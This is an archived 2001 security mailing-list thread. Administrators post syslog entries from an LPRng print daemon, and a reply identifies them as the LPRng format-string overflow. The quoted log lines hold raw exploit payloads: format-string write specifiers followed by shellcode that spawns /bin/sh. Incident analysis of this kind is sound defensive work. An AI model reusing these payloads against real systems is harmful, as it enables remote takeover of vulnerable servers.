Re: Am I Under Attack?

From: John (johnsat_private)
Date: Thu Apr 12 2001 - 15:15:40 PDT

  • Next message: : "(no subject)"

    Hi Tim. I am going to take a guess, but this looks like
    the LPRng overflow, specifically the shellcode used. I
    could be wrong because this shellcode is used in other
    attacks as well.
    
    
    Tim Brown wrote:
    >
    > I tried to post this to the list earlier this week, but it never got here.
    >
    > A sysadmin found about 35 of these entries over a few seconds in her log this
    > morning (4/9/2001).  Any ideas?
    >
    > Apr  5 21:30:27 sun1 bsd-gw[28481]: Invalid protocol request
    > (66):
    >
    > BBBXXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
    >
    > "Leite, Zailo" wrote:
    >
    > > We've been getting this on messages since yesterday. Is this a worm trying
    > > to propagate?
    > >
    > > Z
    > >
    > > Apr  9 10:26:32 bing.bong.edu bsd-gw[25383]: Invalid protocol request (66):
    > > BBBXYZ[XXXXXXXXXXXXXXXXXX%.24u%300$n%.165u%301$n%.253u%302$n%.192u%303$n111F
    > > 1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
    > > Apr  9 10:26:33 bing.bong.edu bsd-gw[25387]: Invalid protocol request (66):
    > > BBBHIJKXXXXXXXXXXXXXXXXXXsecurity%300$n%.181u%301$n%.253u%302$n%.192u%303$n1
    > > 11F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
    > > Apr  9 10:26:33 bing.bong.edu bsd-gw[25388]: Invalid protocol request (66):
    > > BBBDEFGXXXXXXXXXXXXXXXXXXsecu%300$n%.185u%301$n%.253u%302$n%.192u%303$n111F1
    > > f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
    >
    > --
    >
    > Tim Brown
    > Network Security Analyst
    
    --
    The events which transpired five thousand years ago;
    Five years ago or five minutes ago, have determined
    what will happen five minutes from now; five years
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 09:27:53 PDT